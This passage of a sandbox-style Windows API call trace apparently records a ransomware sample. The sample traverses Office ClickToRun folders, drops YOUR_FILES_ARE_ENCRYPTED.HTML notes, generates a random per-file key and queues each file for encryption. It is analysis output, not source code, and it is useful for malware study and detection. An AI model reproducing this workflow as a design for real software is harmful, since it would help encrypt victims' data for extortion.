dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0105.179] WriteFile (in: hFile=0x314, lpBuffer=0x6dd4e0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6dd4e0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0105.180] CloseHandle (hObject=0x314) returned 1 [0105.180] GetProcessHeap () returned 0x600000 [0105.180] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0105.181] GetProcessHeap () returned 0x600000 [0105.181] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a3370 | out: hHeap=0x600000) returned 1 [0105.181] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 0 [0105.181] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0105.184] wnsprintfW (in: pszDest=0x693368, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0105.184] GetProcessHeap () returned 0x600000 [0105.184] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a3370 [0105.184] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0105.185] WriteFile (in: hFile=0x310, lpBuffer=0x6a3370*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6a3370*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0105.186] CloseHandle (hObject=0x310) returned 1 [0105.186] GetProcessHeap () returned 0x600000 [0105.186] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a3370 | out: hHeap=0x600000) returned 1 [0105.186] GetProcessHeap () returned 0x600000 [0105.186] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x693368 | out: hHeap=0x600000) returned 1 [0105.187] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1c4bfed4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1c4bfed4, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="UserData", cAlternateFileName="")) returned 1 [0105.187] StrStrIW (lpFirst="UserData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.187] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData") returned 48 [0105.187] GetProcessHeap () returned 0x600000 [0105.187] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0105.188] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData" [0105.188] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\*" [0105.188] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1c4bfed4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1c4bfed4, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0105.188] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1c4bfed4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1c4bfed4, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0105.189] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1c4bfed4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1c4bfed4, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 0 [0105.189] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0105.189] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0105.189] GetProcessHeap () returned 0x600000 [0105.189] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed4e8 [0105.189] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\userdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0105.189] WriteFile (in: hFile=0x310, lpBuffer=0x6ed4e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed4e8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0105.190] CloseHandle (hObject=0x310) returned 1 [0105.191] GetProcessHeap () returned 0x600000 [0105.191] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed4e8 | out: hHeap=0x600000) returned 1 [0105.191] GetProcessHeap () returned 0x600000 [0105.191] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0105.191] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x4eb55735, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x4eb55735, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1 [0105.191] StrStrIW (lpFirst="{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.192] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned 78 [0105.192] GetProcessHeap () returned 0x600000 [0105.192] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0105.193] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}" [0105.193] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*" [0105.193] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x4eb55735, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x50ae9ce0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0105.194] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x4eb55735, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x50ae9ce0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="..", cAlternateFileName="")) returned 1 [0105.196] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ae9ce0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x50ae9ce0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa11790db, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x44e23, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="AirSpace.Etw.man", cAlternateFileName="AIRSPA~1.MAN")) returned 1 [0105.196] StrStrIW (lpFirst="AirSpace.Etw.man", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.196] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man") returned 95 [0105.196] PathFindExtensionW (pszPath="AirSpace.Etw.man") returned=".man" [0105.196] lstrlenW (lpString=".man") returned 4 [0105.196] PathFindExtensionW (pszPath="AirSpace.Etw.man") returned=".man" [0105.196] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x844141f3, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x844141f3, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x6448e57d, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9786, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", cAlternateFileName="C25A45~1.XML")) returned 1 [0105.196] StrStrIW (lpFirst="C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.196] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml") returned 129 [0105.196] PathFindExtensionW (pszPath="C2RManifest.Access.Access.x-none.msi.16.x-none.xml") returned=".xml" [0105.196] lstrlenW (lpString=".xml") returned 4 [0105.196] PathFindExtensionW (pszPath="C2RManifest.Access.Access.x-none.msi.16.x-none.xml") returned=".xml" [0105.196] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.196] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.access.access.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0105.196] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=38790) returned 1 [0105.196] GetProcessHeap () returned 0x600000 [0105.197] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3164a58 [0105.199] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="2A") returned 2 [0105.199] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="9C") returned 2 [0105.199] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="22") returned 2 [0105.199] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="40") returned 2 [0105.199] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="C0") returned 2 [0105.199] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="96") returned 2 [0105.199] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="34") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="26") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="79") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="B0") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="26") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="02") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="A3") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="2D") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="EC") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="E7") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="4F") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="35") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="78") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="D3") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="6D") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="BB") returned 2 [0105.199] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="1A") returned 2 [0105.200] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="E2") returned 2 [0105.200] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="60") returned 2 [0105.200] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="CE") returned 2 [0105.200] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="67") returned 2 [0105.200] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="9A") returned 2 [0105.200] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="A8") returned 2 [0105.200] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="5D") returned 2 [0105.200] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="08") returned 2 [0105.200] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="22") returned 2 [0105.200] lstrcpyW (in: lpString1=0x3174b0c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml" [0105.200] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x274, CompletionKey=0x3164a58, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.200] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3164a58, lpOverlapped=0x3164a58) returned 1 [0105.200] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8436b436, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x8436b436, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x65211dfd, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xe048, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.accessmui.msi.16.en-us.xml", cAlternateFileName="C222C2~1.XML")) returned 1 [0105.200] StrStrIW (lpFirst="C2RManifest.accessmui.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.200] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml") returned 117 [0105.200] PathFindExtensionW (pszPath="C2RManifest.accessmui.msi.16.en-us.xml") returned=".xml" [0105.200] lstrlenW (lpString=".xml") returned 4 [0105.201] PathFindExtensionW (pszPath="C2RManifest.accessmui.msi.16.en-us.xml") returned=".xml" [0105.201] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.201] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0105.201] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=57416) returned 1 [0105.201] GetProcessHeap () returned 0x600000 [0105.201] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0105.204] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="AF") returned 2 [0105.204] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="29") returned 2 [0105.204] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="03") returned 2 [0105.204] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="75") returned 2 [0105.204] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="1D") returned 2 [0105.204] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="41") returned 2 [0105.204] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="DD") returned 2 [0105.204] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="60") returned 2 [0105.204] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="5A") returned 2 [0105.204] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="C3") returned 2 [0105.204] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="8F") returned 2 [0105.204] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="DA") returned 2 [0105.204] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="59") returned 2 [0105.204] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="6C") returned 2 [0105.204] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="6D") returned 2 [0105.204] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="F6") returned 2 [0105.204] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="DD") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="35") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="EC") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="61") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="72") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="9D") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="C9") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="7D") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="1B") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="1D") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="02") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="14") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="73") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="7C") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="EA") returned 2 [0105.205] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="63") returned 2 [0105.205] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" [0105.205] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.205] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0105.205] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843453b4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x843453b4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x654c802f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="C2RManifest.accessmuiset.msi.16.en-us.xml", cAlternateFileName="C2FB2E~1.XML")) returned 1 [0105.206] StrStrIW (lpFirst="C2RManifest.accessmuiset.msi.16.en-us.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.206] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml") returned 120 [0105.206] PathFindExtensionW (pszPath="C2RManifest.accessmuiset.msi.16.en-us.xml") returned=".xml" [0105.206] lstrlenW (lpString=".xml") returned 4 [0105.206] PathFindExtensionW (pszPath="C2RManifest.accessmuiset.msi.16.en-us.xml") returned=".xml" [0105.206] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0105.206] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0105.207] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=2042) returned 1 [0105.207] GetProcessHeap () returned 0x600000 [0105.207] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0105.252] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="4F") returned 2 [0105.252] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="04") returned 2 [0105.252] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="4C") returned 2 [0105.252] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="AD") returned 2 [0105.252] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="89") returned 2 [0105.252] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="A1") returned 2 [0105.252] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="72") returned 2 [0105.252] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="0C") returned 2 [0105.252] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="2B") returned 2 [0105.252] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="BD") returned 2 [0105.252] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | 